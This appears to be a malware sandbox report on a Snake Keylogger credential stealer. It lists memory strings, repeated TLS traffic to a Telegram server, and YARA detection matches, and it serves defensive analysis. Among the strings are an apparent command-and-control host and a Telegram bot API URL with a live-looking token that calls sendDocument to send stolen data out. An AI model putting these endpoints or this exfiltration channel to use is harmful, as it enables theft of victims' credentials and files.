Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059A0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab#J |
Source: RegSvcs.exe, 00000001.00000002.3808058060.0000000000709000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059EE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1acc170ef6d2e |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1acc170ef6 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1fe76c67b1 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?271409c843 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?281ec76f7b |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b0ff2c559 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b626a0cfe |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ba8557f9fc |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6fde197b3 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/0 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/02 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.godaddy.com/05 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000024F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002475000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000024F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-471 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://certs.godaddy.com/repository/0 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.00000000023B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/ |
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49657 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49634 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49637 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49663 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown | Network traffic detected: HTTP traffic on port 49640 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49654 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49643 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown | Network traffic detected: HTTP traffic on port 49660 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49649 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682 |
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49680 |
Source: unknown | Network traffic detected: HTTP traffic on port 49655 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49632 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49661 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49658 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 49629 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49680 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49646 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49676 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49674 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49673 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49672 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49671 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49635 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49652 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49638 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 49641 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702 |
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701 |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49647 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49663 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49662 |
Source: unknown | Network traffic detected: HTTP traffic on port 49676 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49661 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49660 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49653 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49630 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49644 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49627 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49659 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49658 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49657 |
Source: unknown | Network traffic detected: HTTP traffic on port 49650 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49656 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49655 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49654 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49653 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49652 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49651 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49650 |
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49633 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49636 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49649 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49648 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49647 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49646 |
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49645 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49644 |
Source: unknown | Network traffic detected: HTTP traffic on port 49651 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49643 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49642 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49641 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49640 |
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49639 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49639 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49638 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49637 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49636 |
Source: unknown | Network traffic detected: HTTP traffic on port 49642 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49635 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49634 |
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49633 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49632 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49631 |
Source: unknown | Network traffic detected: HTTP traffic on port 49648 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49630 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49656 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49631 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49662 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49659 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49629 |
Source: unknown | Network traffic detected: HTTP traffic on port 49645 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49628 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown | Network traffic detected: HTTP traffic on port 49628 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49627 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49642 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49643 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49649 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49650 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49651 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49652 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49653 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49654 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49655 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49656 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49657 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49658 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49659 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49660 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49661 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49662 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49663 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49671 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49672 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49673 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49674 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49676 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49680 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49682 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49683 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49697 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49700 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49701 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49702 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49703 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49723 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49739 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49741 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49747 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2 |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00427859 | 0_2_00427859 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0040F890 | 0_2_0040F890 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00427161 | 0_2_00427161 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0042397B | 0_2_0042397B |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00409A40 | 0_2_00409A40 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_004212BE | 0_2_004212BE |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00411B63 | 0_2_00411B63 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0047CBF0 | 0_2_0047CBF0 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0041A46B | 0_2_0041A46B |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00446566 | 0_2_00446566 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00423EBF | 0_2_00423EBF |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0041D750 | 0_2_0041D750 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00424F70 | 0_2_00424F70 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0041AF0D | 0_2_0041AF0D |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_004037E0 | 0_2_004037E0 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00A93620 | 0_2_00A93620 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222D278 | 1_2_0222D278 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_02225370 | 1_2_02225370 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222C146 | 1_2_0222C146 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222C738 | 1_2_0222C738 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222C468 | 1_2_0222C468 |
